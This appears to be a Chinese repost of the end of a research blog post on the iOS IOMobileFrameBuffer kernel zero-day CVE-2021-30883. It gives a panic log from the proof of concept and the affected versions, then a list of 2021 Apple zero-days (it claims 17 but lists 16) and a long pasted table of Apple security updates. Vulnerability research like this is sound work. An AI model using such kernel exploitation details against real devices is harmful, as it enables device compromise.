panic(cpu 4 caller 0xfffffff0083441dc): [default.kalloc.80]: element modified after free (off:0, val:0x4141414141414141, sz:80, ptr:0xffffffe379503430)
    0: 0x4141414141414141
    8: 0x4141414141414141
Debugger message: panic
Device: D421
Hardware Model: iPhone12,3

我不得不承认,看到这个技巧如此有效让我很高兴:)

总结

我希望您喜欢阅读这篇博文,并且我设法阐明了上次 iOS 更新。

此外,如您所见,Corellium在这段短暂的旅程中是非常宝贵的资产。轻松调试内核的能力非常棒,它为我节省了很多时间。而且,当然,虚拟设备上的行为在物理设备上完全相同,只有 0 次更改。

材料和版本

我在此处展示的 POC 在 iOS 14.7.1-15.0.1 上的工作原理完全相同。对于更早的版本可能也是如此,但我只检查了 14.7.1-15.0.1。请注意,在不同的设备/版本上,某些常量可能会有所不同。我专门写了我测试过的设备/版本,它看起来是一致的,但在旧版本上可能会有所不同。只是为了好玩,我也在 iPhone 11 Pro Max、iOS 15.0 上检查了它,它的工作原理是一样的 🙂

POC 的代码可以在这个repo 中找到。

历史漏洞信息

CVE-2021-30883 也是继 Apple 在 2021 年 7 月解决了类似的匿名报告的内存损坏问题 (CVE-2021-30807) 之后,第二个影响 IOMobileFrameBuffer 的零日漏洞,这增加了这两个缺陷可能相关的可能性。通过最新的修复,该公司仅在 2021 年就解决了创纪录的 17 个零日问题——

  • CVE-2021-1782(内核)- 恶意应用程序可能能够提升权限
  • CVE-2021-1870 (WebKit) – 远程攻击者可能会导致任意代码执行
  • CVE-2021-1871 (WebKit) – 远程攻击者可能会导致任意代码执行
  • CVE-2021-1879 (WebKit) – 处理恶意制作的 Web 内容可能导致通用跨站点脚本
  • CVE-2021-30657(系统首选项)- 恶意应用程序可能会绕过 Gatekeeper 检查
  • CVE-2021-30661(WebKit 存储) – 处理恶意制作的 Web 内容可能会导致任意代码执行
  • CVE-2021-30663 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
  • CVE-2021-30665 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
  • CVE-2021-30666 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
  • CVE-2021-30713(TCC 框架)- 恶意应用程序可能能够绕过隐私首选项
  • CVE-2021-30761 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
  • CVE-2021-30762 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
  • CVE-2021-30807 (IOMobileFrameBuffer) – 应用程序可能能够以内核权限执行任意代码
  • CVE-2021-30858 (WebKit) – 处理恶意制作的 Web 内容可能会导致任意代码执行
  • CVE-2021-30860 (CoreGraphics) – 处理恶意制作的 PDF 可能会导致任意代码执行
  • CVE-2021-30869 (XNU) – 恶意应用程序可能能够以内核权限执行任意代码

强烈建议苹果 iPhone 和 iPad 用户更新到最新版本(iOS 15.0.2 和 iPad 15.0.2)以缓解安全漏洞。

Apple 安全性更新列表

名称和信息链接适用于发布日期
iOS 15.0.1 和 iPadOS 15.0.1
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 10 月 1 日
安全性更新 2021-006 CatalinamacOS Catalina2021 年 9 月 23 日
iOS 12.5.5iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代)2021 年 9 月 23 日
Windows 版 iTunes 12.12Windows 10 及更高版本2021 年 9 月 20 日
Safari 浏览器 15macOS Big Sur 和 macOS Catalina2021 年 9 月 20 日
Xcode 13macOS Big Sur 11.3 及更高版本2021 年 9 月 20 日
Apple tvOS 15Apple TV 4K 和 Apple TV HD2021 年 9 月 20 日
watchOS 8Apple Watch Series 3 及更新机型2021 年 9 月 20 日
iOS 15 和 iPadOS 15iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 9 月 20 日
iTunes U 3.8.3iOS 12.4 及更高版本或 iPadOS 12.4 及更高版本2021 年 9 月 15 日
Safari 浏览器 14.1.2macOS Catalina 和 macOS Mojave2021 年 9 月 13 日
安全性更新 2021-005 CatalinamacOS Catalina2021 年 9 月 13 日
macOS Big Sur 11.6macOS Big Sur2021 年 9 月 13 日
watchOS 7.6.2Apple Watch Series 3 及更新机型2021 年 9 月 13 日
iOS 14.8 和 iPadOS 14.8iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 9 月 13 日
Windows 版 iCloud 12.5Windows 10 及更高版本,通过 Microsoft Store 获取2021 年 8 月 16 日
macOS Big Sur 11.5.2
这个更新没有已发布的 CVE 条目。
macOS Big Sur2021 年 8 月 11 日
Windows 版 iTunes 12.11.4Windows 10 及更高版本2021 年 8 月 9 日
watchOS 7.6.1Apple Watch Series 3 及更新机型2021 年 7 月 29 日
iOS 14.7.1 和 iPadOS 14.7.1iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 7 月 26 日
macOS Big Sur 11.5.1macOS Big Sur2021 年 7 月 26 日
macOS Big Sur 11.5macOS Big Sur2021 年 7 月 21 日
安全性更新 2021-004 CatalinamacOS Catalina2021 年 7 月 21 日
安全性更新 2021-005 MojavemacOS Mojave2021 年 7 月 21 日
iPadOS 14.7iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型,以及 iPad mini 4 及更新机型2021 年 7 月 21 日
Safari 浏览器 14.1.2macOS Catalina 和 macOS Mojave2021 年 7 月 19 日
iOS 14.7iPhone 6s 及更新机型和 iPod touch(第 7 代)2021 年 7 月 19 日
watchOS 7.6Apple Watch Series 3 及更新机型2021 年 7 月 19 日
Apple tvOS 14.7Apple TV 4K 和 Apple TV HD2021 年 7 月 19 日
iMovie 剪辑 10.2.4macOS Catalina 10.15.6 及更高版本2021 年 6 月 17 日
iOS 12.5.4iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代)2021 年 6 月 14 日
Safari 浏览器 14.1.1macOS Catalina 和 macOS Mojave2021 年 5 月 24 日
安全性更新 2021-003 CatalinamacOS Catalina2021 年 5 月 24 日
安全性更新 2021-004 MojavemacOS Mojave2021 年 5 月 24 日
macOS Big Sur 11.4macOS Big Sur2021 年 5 月 24 日
iOS 14.6 和 iPadOS 14.6iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 5 月 24 日
Apple tvOS 14.6Apple TV 4K 和 Apple TV HD2021 年 5 月 24 日
watchOS 7.5Apple Watch Series 3 及更新机型2021 年 5 月 24 日
启动转换 6.1.14Mac Pro(2013 年末及更新机型)、MacBook Pro(2013 年末及更新机型)、MacBook Air(2013 年中及更新机型)、Mac mini(2014 年中及更新机型)、iMac(2014 年中及更新机型)、MacBook(2015 年初及更新机型)、iMac Pro(2017 年末)2021 年 5 月 17 日
Safari 浏览器 14.1macOS Catalina 和 macOS Mojave2021 年 5 月 4 日
macOS Big Sur 11.3.1macOS Big Sur2021 年 5 月 3 日
iOS 14.5.1 和 iPadOS 14.5.1iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 5 月 3 日
iOS 12.5.3iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代)2021 年 5 月 3 日
watchOS 7.4.1Apple Watch Series 3 及更新机型2021 年 5 月 3 日
Windows 版 iCloud 12.3Windows 10 及更高版本,通过 Microsoft Store 获取2021 年 4 月 26 日
Xcode 12.5macOS Big Sur 11 及更高版本2021 年 4 月 26 日
Safari 浏览器 14.1macOS Catalina 和 macOS Mojave2021 年 4 月 26 日
macOS Big Sur 11.3macOS Big Sur2021 年 4 月 26 日
安全性更新 2021-002 CatalinamacOS Catalina2021 年 4 月 26 日
安全性更新 2021-003 Mojave macOS Mojave2021 年 4 月 26 日
iOS 14.5 和 iPadOS 14.5iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 4 月 26 日
watchOS 7.4Apple Watch Series 3 及更新机型2021 年 4 月 26 日
Apple tvOS 14.5Apple TV 4K 和 Apple TV HD2021 年 4 月 26 日
Windows 版 iTunes 12.11.3Windows 10 及更高版本2021 年 4 月 22 日
库乐队 10.4.3macOS Big Sur2021 年 4 月 6 日
iOS 14.4.2 和 iPadOS 14.4.2iPhone 6s 及更新机型、iPad Pro(所有机型)、iPad Air 2 及更新机型、iPad(第 5 代)及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 3 月 26 日
iOS 12.5.2iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代)2021 年 3 月 26 日
watchOS 7.3.3Apple Watch Series 3 及更新机型2021 年 3 月 26 日
Safari 浏览器 14.0.3(版本 14610.4.3.1.7 和 15610.4.3.1.7)macOS Catalina 和 macOS Mojave2021 年 3 月 8 日
macOS Big Sur 11.2.3 macOS Big Sur2021 年 3 月 8 日
watchOS 7.3.2Apple Watch Series 3 及更新机型2021 年 3 月 8 日
iOS 14.4.1 和 iPadOS 14.4.1iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 3 月 8 日
macOS Big Sur 11.2.2
这个更新没有已发布的 CVE 条目。
macOS Big Sur 11.2.12021 年 2 月 25 日
watchOS 7.3.1
这个更新没有已发布的 CVE 条目。
Apple Watch Series 5 和 Apple Watch SE2021 年 2 月 15 日
macOS Big Sur 11.2.1、macOS Catalina 10.15.7 补充更新、macOS Mojave 10.14.6 安全性更新 2021-002macOS Big Sur 11.2、macOS Catalina 10.15.7 和 macOS Mojave 10.14.6 2021 年 2 月 9 日
Safari 浏览器 14.0.3macOS Catalina 和 macOS Mojave2021 年 2 月 1 日
macOS Big Sur 11.2、安全性更新 2021-001 Catalina、安全性更新 2021-001 MojavemacOS Big Sur 11.0.1、macOS Catalina 10.15.7 和 macOS Mojave 10.14.62021 年 2 月 1 日
Xcode 12.4macOS Catalina 10.15.4 及更高版本2021 年 1 月 26 日
Windows 版 iCloud 12.0Windows 10 及更高版本,通过 Microsoft Store 获取2021 年 1 月 26 日
iOS 14.4 和 iPadOS 14.4iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2021 年 1 月 26 日
Apple tvOS 14.4Apple TV 4K 和 Apple TV HD2021 年 1 月 26 日
watchOS 7.3Apple Watch Series 3 及更新机型2021 年 1 月 26 日
iOS 12.5.1
这个更新没有已发布的 CVE 条目。
iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代)2021 年 1 月 11 日
iOS 14.3 和 iPadOS 14.3iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2020 年 12 月 14 日
macOS Big Sur 11.1、安全性更新 2020-001 Catalina、安全性更新 2020-007 MojavemacOS Big Sur 11.0.1、macOS Catalina 10.15.7 和 macOS Mojave 10.14.62020 年 12 月 14 日
macOS 服务器 5.11macOS Big Sur2020 年 12 月 14 日
Apple tvOS 14.3Apple TV 4K 和 Apple TV HD2020 年 12 月 14 日
watchOS 7.2Apple Watch Series 3 及更新机型2020 年 12 月 14 日
Safari 浏览器 14.0.2macOS Catalina 和 macOS Mojave2020 年 12 月 14 日
iOS 12.5iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch(第 6 代)2020 年 12 月 14 日
watchOS 6.3Apple Watch Series 1 和 Apple Watch Series 22020 年 12 月 14 日
Windows 版 iCloud 11.5Windows 10 及更高版本,通过 Microsoft Store 获取2020 年 12 月 2 日
iOS 14.2.1
这个更新没有已发布的 CVE 条目。
iPhone 12 Pro、iPhone 12 Pro Max、iPhone 12 和 iPhone 12 mini2020 年 11 月 19 日
macOS Big Sur 11.0.1Mac mini(M1,2020 年)、MacBook Air(M1,2020 年)、MacBook Air(13 英寸,2020 年)2020 年 11 月 17 日
Windows 版 iTunes 12.11Windows 10 及更高版本2020 年 11 月 17 日
Safari 浏览器 14.0.1macOS Catalina 和 macOS Mojave2020 年 11 月 12 日
安全性更新 2020-006 High Sierra、安全性更新 2020-006 MojavemacOS High Sierra 10.13.6、macOS Mojave 10.14.62020 年 11 月 12 日
macOS Big Sur 11.0.1(“使用忠告”中包含 macOS Big Sur 11.0 和 macOS Big Sur 11.0.1 的安全性内容)Mac Pro(2013 年及更新机型)、MacBook Air(2013 年及更新机型)、MacBook Pro(2013 年末及更新机型)、Mac mini(2014 年及更新机型)、iMac(2014 年及更新机型)、MacBook(2015 年及更新机型)、iMac Pro(所有机型)2020 年 11 月 12 日
macOS Big Sur 11.0只有某些 Mac 机型会预先安装;请更新到 macOS Big Sur 11.0.1预先安装
Fire OS 版 Apple TV AppApple TV 5.1 及更新机型2020 年 11 月 9 日
watchOS 7.1Apple Watch Series 3 及更新机型2020 年 11 月 5 日
watchOS 6.2.9Apple Watch Series 1 和 Apple Watch Series 22020 年 11 月 5 日
watchOS 5.3.9Apple Watch Series 1 及更新机型2020 年 11 月 5 日
macOS Catalina 10.15.7 补充更新、macOS Catalina 10.15.7 更新macOS Catalina 10.15.72020 年 11 月 5 日
Apple tvOS 14.2Apple TV 4K 和 Apple TV HD2020 年 11 月 5 日
iOS 14.2 和 iPadOS 14.2iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2020 年 11 月 5 日
iOS 12.4.9iPhone 5s、iPhone 6 和 6 Plus、iPad Air、iPad mini 2 和 3、iPod touch(第 6 代)2020 年 11 月 5 日
安卓版 Apple Music 3.4.0安卓版本 5.0 及更高版本2020 年 10 月 26 日
iOS 14.1 和 iPadOS 14.1
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2020 年 10 月 20 日
watchOS 7.0.3
这个更新没有已发布的 CVE 条目。
Apple Watch Series 32020 年 10 月 19 日
watchOS 7.0.2
这个更新没有已发布的 CVE 条目。
Apple Watch Series 3 及更新机型2020 年 10 月 12 日
Apple tvOS 14.0.2
这个更新没有已发布的 CVE 条目。
Apple TV 4K 和 Apple TV HD2020 年 10 月 5 日
macOS 10.14.6 补充更新macOS Mojave2020 年 10 月 1 日
Windows 版 iCloud 7.21Windows 7 及更高版本2020 年 9 月 24 日
Windows 版 iCloud 11.4Windows 10 及更高版本,通过 Microsoft Store 获取2020 年 9 月 24 日
macOS Catalina 10.15.7、安全性更新 2020-005 High Sierra、安全性更新 2020-005 MojavemacOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.62020 年 9 月 24 日
iOS 14.0.1 和 iPadOS 14.0.1
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch(第 7 代)2020 年 9 月 24 日
watchOS 7.0.1
这个更新没有已发布的 CVE 条目。
Apple Watch Series 3 及更新机型2020 年 9 月 24 日
Apple tvOS 14.0.1
这个更新没有已发布的 CVE 条目。
Apple TV 4K 和 Apple TV HD2020 年 9 月 24 日
Safari 浏览器 14.0macOS Catalina 和 macOS Mojave2020 年 9 月 16 日
Apple tvOS 14.0Apple TV 4K 和 Apple TV HD2020 年 9 月 16 日
watchOS 7.0Apple Watch Series 3 及更新机型2020 年 9 月 16 日
iOS 14.0 和 iPadOS 14.0iPhone 6s 及更新机型、iPod touch 第 7 代、iPad Air 2 及更新机型和 iPad mini 4 及更新机型2020 年 9 月 16 日
Windows 版 iTunes 12.10.9Windows 7 及更高版本2020 年 9 月 16 日
Xcode 12.0macOS Catalina 10.15.4 及更高版本2020 年 9 月 16 日
iOS 13.7
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 9 月 1 日
iOS 13.6.1
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 8 月 12 日
macOS Catalina 10.15.6 补充更新
这个更新没有已发布的 CVE 条目。
macOS Catalina 10.15.62020 年 8 月 12 日
Windows 版 iCloud 11.3Windows 10 及更高版本,通过 Microsoft Store 获取2020 年 8 月 10 日
Windows 版 iCloud 7.20Windows 7 及更高版本2020 年 8 月 10 日
Windows 版 iTunes 12.10.8Windows 7 及更高版本2020 年 7 月 30 日
Safari 浏览器 13.1.2macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中2020 年 7 月 15 日
iOS 12.4.8
这个更新没有已发布的 CVE 条目。
iPhone 5s、iPhone 6 和 6 Plus、iPad Air、iPad mini 2 和 3、iPod touch(第 6 代)2020 年 7 月 15 日
watchOS 5.3.8
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1、2、3 和 42020 年 7 月 15 日
Xcode 11.6
这个更新没有已发布的 CVE 条目。
macOS Mojave 10.15.2 及更高版本2020 年 7 月 15 日
iOS 13.6 和 iPadOS 13.6iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 7 月 15 日
Apple tvOS 13.4.8Apple TV 4K 和 Apple TV HD2020 年 7 月 15 日
watchOS 6.2.8Apple Watch Series 1 及更新机型2020 年 7 月 15 日
macOS Catalina 10.15.6、安全性更新 2020-004 Mojave、安全性更新 2020-004 High SierramacOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.52020 年 7 月 15 日
macOS Catalina 10.15.5 补充更新、安全性更新 2020-003 High SierramacOS High Sierra 10.13.6、macOS Catalina 10.15.52020 年 6 月 1 日
Apple tvOS 13.4.6Apple TV 4K 和 Apple TV HD2020 年 6 月 1 日
watchOS 6.2.6Apple Watch Series 1 及更新机型2020 年 6 月 1 日
iOS 13.5.1 和 iPadOS 13.5.1iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 6 月 1 日
macOS Catalina 10.15.5、安全性更新 2020-003 Mojave、安全性更新 2020-003 High SierramacOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.42020 年 5 月 26 日
Windows 迁移助理 2.2.0.0 (v. 1A11)macOS Catalina2020 年 5 月 26 日
Safari 浏览器 13.1.1macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中2020 年 5 月 26 日
Windows 版 iCloud 11.2Windows 10 及更高版本,通过 Microsoft Store 获取2020 年 5 月 26 日
Windows 版 iCloud 7.19Windows 7 及更高版本2020 年 5 月 26 日
Windows 版 iTunes 12.10.7Windows 7 及更高版本2020 年 5 月 21 日
iOS 13.5 和 iPadOS 13.5iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 5 月 20 日
iOS 12.4.7iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代2020 年 5 月 20 日
Apple tvOS 13.4.5Apple TV 4K 和 Apple TV HD2020 年 5 月 20 日
Xcode 11.5macOS Catalina 10.15.2 及更高版本2020 年 5 月 20 日
watchOS 5.3.7Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的 iPhone 配对的情况下)2020 年 5 月 18 日
watchOS 6.2.5Apple Watch Series 1 及更新机型2020 年 5 月 18 日
iOS 13.4.1
这个更新没有已发布的 CVE 条目。
iPhone SE(第 2 代)2020 年 4 月 23 日
watchOS 6.2.1
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1 和 2
Apple Watch Series 3 及更新机型
2020 年 4 月 20 日
2020 年 4 月 8 日
Xcode 11.4.1macOS Catalina 10.15.2 及更高版本2020 年 4 月 15 日
macOS Catalina 10.15.4 补充更新
这个更新没有已发布的 CVE 条目。
macOS Catalina 10.15.42020 年 4 月 8 日
iOS 13.4.1 和 iPadOS 13.4.1
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 4 月 7 日
Windows 版 iCloud 7.18Windows 7 及更高版本2020 年 3 月 25 日
Windows 版 iCloud 10.9.3Windows 10 及更高版本,通过 Microsoft Store 获取2020 年 3 月 25 日
Windows 版 iTunes 12.10.5Windows 7 及更高版本2020 年 3 月 24 日
iOS 13.4 和 iPadOS 13.4iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 3 月 24 日
watchOS 5.3.6
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的 iPhone 配对的情况下)2020 年 3 月 24 日
iOS 12.4.6
这个更新没有已发布的 CVE 条目。
iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代2020 年 3 月 24 日
Safari 浏览器 13.1macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中2020 年 3 月 24 日
watchOS 6.2Apple Watch Series 1 及更新机型2020 年 3 月 24 日
Apple tvOS 13.4Apple TV 4K 和 Apple TV HD2020 年 3 月 24 日
macOS Catalina 10.15.4、安全性更新 2020-002 Mojave、安全性更新 2020-002 High SierramacOS High Sierra 10.13.6、macOS Mojave 10.14.6、macOS Catalina 10.15.32020 年 3 月 24 日
Xcode 11.4macOS Catalina 10.15.2 及更高版本2020 年 3 月 24 日
watchOS 6.1.3
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1 及更新机型2020 年 2 月 18 日
watchOS 5.3.5
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的 iPhone 配对的情况下)2020 年 2 月 18 日
Windows 版 iCloud 10.9.2Windows 10 及更高版本,通过 Microsoft Store 获取2020 年 1 月 29 日
Windows 版 iTunes 12.10.4Windows 7 及更高版本2020 年 1 月 28 日
Apple tvOS 13.3.1Apple TV 4K 和 Apple TV HD2020 年 1 月 28 日
Safari 浏览器 13.0.5macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中2020 年 1 月 28 日
iOS 12.4.5
这个更新没有已发布的 CVE 条目。
iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代2020 年 1 月 28 日
iOS 13.3.1 和 iPadOS 13.3.1iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2020 年 1 月 28 日
Windows 版 iCloud 7.17Windows 7 及更高版本2020 年 1 月 28 日
watchOS 6.1.2Apple Watch Series 1 及更新机型2020 年 1 月 28 日
macOS Catalina 10.15.3、安全性更新 2020-001 Mojave、安全性更新 2020-001 High SierramacOS High Sierra 10.13.6、macOS Mojave 10.14.6 和 macOS Catalina 10.15.22020 年 1 月 28 日
Windows 版 iCloud 10.9.1
这个更新没有已发布的 CVE 条目。
Windows 10 及更高版本,通过 Microsoft Store 获取2020 年 1 月 8 日
Windows 版 iCloud 10.9Windows 10 及更高版本,通过 Microsoft Store 获取2019 年 12 月 11 日
Windows 版 iCloud 7.16Windows 7 及更高版本2019 年 12 月 11 日
Windows 版 iTunes 12.10.3Windows 7 及更高版本2019 年 12 月 11 日
Xcode 11.3macOS Mojave 10.14.4 及更高版本2019 年 12 月 10 日
watchOS 5.3.4Apple Watch Series 1、Apple Watch Series 2、Apple Watch Series 3 和 Apple Watch Series 4(在已与装有 iOS 12 的设备配对的情况下)2019 年 12 月 10 日
watchOS 6.1.1Apple Watch Series 1 及更新机型2019 年 12 月 10 日
Apple tvOS 13.3Apple TV 4K 和 Apple TV HD2019 年 12 月 10 日
macOS Catalina 10.15.2、安全性更新 2019-002 Mojave 和安全性更新 2019-007 High SierramacOS Catalina 10.15、macOS Mojave 10.14.6、macOS High Sierra 10.13.62019 年 12 月 10 日
Safari 浏览器 13.0.4macOS Mojave 和 macOS High Sierra,随附于 macOS Catalina 中2019 年 12 月 10 日
iOS 12.4.4iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代2019 年 12 月 10 日
iOS 13.3 和 iPadOS 13.3iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 12 月 10 日
iOS 13.2.3 和 iPadOS 13.2.3
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 11 月 18 日
iOS 13.2.2 和 iPadOS 13.2.2
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 11 月 7 日
Xcode 11.2macOS Mojave 10.14.4 及更高版本2019 年 10 月 31 日
Windows 版 iTunes 12.10.2Windows 7 及更高版本2019 年 10 月 30 日
Windows 版 iCloud 10.8Windows 10 及更高版本,通过 Microsoft Store 获取2019 年 10 月 30 日
Windows 版 iCloud 7.15Windows 7 及更高版本2019 年 10 月 30 日
macOS Catalina 10.15.1、安全性更新 2019-001 和安全性更新 2019-006macOS Catalina 10.15、macOS Mojave 10.14.6 和 macOS High Sierra 10.13.62019 年 10 月 29 日
watchOS 5.3.3
这个更新没有已发布的 CVE 条目。
Apple Watch Series 1、2、3 和 42019 年 10 月 29 日
watchOS 6.1Apple Watch Series 1 及更新机型2019 年 10 月 29 日
Safari 浏览器 13.0.3macOS Mojave 10.14.6 和 macOS High Sierra 10.13.62019 年 10 月 28 日
iOS 13.2 和 iPadOS 13.2iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 10 月 28 日
iOS 12.4.3iPhone 5s、iPhone 6 和 6 Plus、iPad Air、iPad mini 2 和 3、iPod touch(第 6 代)2019 年 10 月 28 日
Apple tvOS 13.2Apple TV 4K 和 Apple TV HD2019 年 10 月 28 日
macOS Catalina 10.15 补充更新
这个更新没有已发布的 CVE 条目。
MacBook(2015 年初及更新机型)、MacBook Air(2012 年中及更新机型)、MacBook Pro(2012 年中及更新机型)、Mac mini(2012 年末及更新机型)、iMac (2012 年末及更新机型)、iMac Pro(所有机型)和 Mac Pro(2013 年末及更新机型)2019 年 10 月 15 日
iOS 13.1.3 和 iPadOS 13.1.3
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 10 月 15 日
Ubuntu 版 Swift 5.1.1Ubuntu 14.04、16.04 和 18.042019 年 10 月 11 日
Windows 版 iTunes 12.10.1Windows 7 及更高版本2019 年 10 月 7 日
Windows 版 iCloud 7.14Windows 7 及更高版本2019 年 10 月 7 日
Windows 版 iCloud 10.7Windows 10 及更高版本,通过 Microsoft Store 获取2019 年 10 月 7 日
Safari 浏览器 13.0.2
这个更新没有已发布的 CVE 条目。
macOS Mojave 10.14.6 和 macOS High Sierra 10.13.62019 年 10 月 7 日
macOS Catalina 10.15MacBook(2015 年初及更新机型)、MacBook Air(2012 年中及更新机型)、MacBook Pro(2012 年中及更新机型)、Mac mini(2012 年末及更新机型)、iMac (2012 年末及更新机型)、iMac Pro(所有机型)和 Mac Pro(2013 年末及更新机型)2019 年 10 月 7 日
SwiftNIO SSL 2.4.1Ubuntu 14.04 及更高版本上的 SwiftNIO SSL 2.0.0 至 2.4.02019 年 10 月 4 日
watchOS 6.0.1
这个更新没有已发布的 CVE 条目。
Apple Watch Series 3 及更新机型2019 年 9 月 30 日
iOS 13.1.2 和 iPadOS 13.1.2
这个更新没有已发布的 CVE 条目。
iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 9 月 30 日
iOS 13.1.1 和 iPadOS 13.1.1iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 9 月 27 日
macOS Mojave 10.14.6 补充更新 2、安全性更新 2019-005 High Sierra、安全性更新 2019-005 SierramacOS Sierra 10.12.6、macOS High Sierra 10.13.6 和 macOS Mojave 10.14.62019 年 9 月 26 日
watchOS 5.3.2Apple Watch Series 1 和 Apple Watch Series 22019 年 9 月 26 日
iOS 12.4.2iPhone 5s、iPhone 6、iPhone 6 Plus、iPad Air、iPad mini 2、iPad mini 3 和 iPod touch 第 6 代2019 年 9 月 26 日
iOS 13.1 和 iPadOS 13.1iPhone 6s 及更新机型、iPad Air 2 及更新机型、iPad mini 4 及更新机型,以及 iPod touch 第 7 代2019 年 9 月 24 日
